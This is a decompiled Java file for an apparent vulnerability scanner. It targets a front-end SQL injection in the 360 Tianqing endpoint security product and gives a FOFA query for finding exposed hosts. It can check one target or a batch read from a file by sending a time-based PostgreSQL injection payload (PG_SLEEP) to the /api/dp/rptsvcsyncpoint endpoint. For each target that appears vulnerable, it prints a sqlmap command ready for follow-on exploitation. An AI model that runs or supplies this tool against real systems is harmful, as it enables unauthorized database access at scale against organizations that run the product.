package defpackage;

import java.util.List;
import java.util.Map;
import java.util.Scanner;
import tools.HttpClient;
import tools.LocalIO;

/* loaded from: input_file:App.class */
public class App {
    public static void main(String[] strArr) {
        System.out.println("\u001b[31;4mAuthor By 雁不过衡阳,github: https://github.com/Yang0615777\u001b[0m");
        System.out.println("FOFA: title=\"360新天擎\"  360天擎前台SQL注入");
        Scanner scanner = new Scanner(System.in);
        System.out.println("请选择验证方式:");
        System.out.println("1.批量验证");
        System.out.println("2.单个利用");
        String nextLine = scanner.nextLine();
        if (nextLine.equals("1")) {
            System.out.println("请输入存放地址txt路径");
            List<String> localTxt = LocalIO.getLocalTxt(scanner.next());
            for (int i = 0; i < localTxt.size(); i++) {
                try {
                    Map<String, String> GetBodyParam = HttpClient.GetBodyParam(localTxt.get(i) + "/api/dp/rptsvcsyncpoint", "ccid=1");
                    if (!GetBodyParam.get("code").equals("200") || GetBodyParam.get("content").indexOf("result") == -1 || GetBodyParam.get("content").indexOf("data") == -1) {
                        System.out.println(localTxt.get(i) + ":不存在漏洞");
                    } else {
                        Map<String, String> GetBodyParam2 = HttpClient.GetBodyParam(localTxt.get(i) + "/api/dp/rptsvcsyncpoint", "ccid=1';select PG_SLEEP(5)--");
                        if (GetBodyParam2.get("flag") == null || !GetBodyParam2.get("flag").equals("true")) {
                            System.out.println(localTxt.get(i) + ":不存在漏洞");
                        } else {
                            System.out.println("\u001b[31;4m" + localTxt.get(i) + ":可能存在漏洞,SQLMAP语法:sqlmap.py -u \"" + localTxt.get(i) + "/api/dp/rptsvcsyncpoint?ccid=1*\" --dbms PostgreSQL\u001b[0m");
                        }
                    }
                } catch (Exception e) {
                }
            }
            return;
        }
        if (!nextLine.equals("2")) {
            System.out.println("请选择正确的序号");
            return;
        }
        System.out.println("请输入域名(例:https://www.baidu.com)");
        String nextLine2 = scanner.nextLine();
        try {
            Map<String, String> GetBodyParam3 = HttpClient.GetBodyParam(nextLine2 + "/api/dp/rptsvcsyncpoint", "ccid=1");
            if (!GetBodyParam3.get("code").equals("200") || GetBodyParam3.get("content").indexOf("result") == -1 || GetBodyParam3.get("content").indexOf("data") == -1) {
                System.out.println(nextLine2 + ":不存在漏洞");
            } else {
                Map<String, String> GetBodyParam4 = HttpClient.GetBodyParam(nextLine2 + "/api/dp/rptsvcsyncpoint", "ccid=1';select PG_SLEEP(5)--");
                if (GetBodyParam4.get("flag") == null || !GetBodyParam4.get("flag").equals("true")) {
                    System.out.println(nextLine2 + ":不存在漏洞");
                } else {
                    System.out.println("\u001b[31;4m" + nextLine2 + ":可能存在漏洞,SQLMAP语法:sqlmap.py -u \"" + nextLine2 + "/api/dp/rptsvcsyncpoint?ccid=1*\" --dbms PostgreSQL\u001b[0m");
                }
            }
        } catch (Exception e2) {
            System.out.println(nextLine2 + ":不存在漏洞");
        }
    }
}
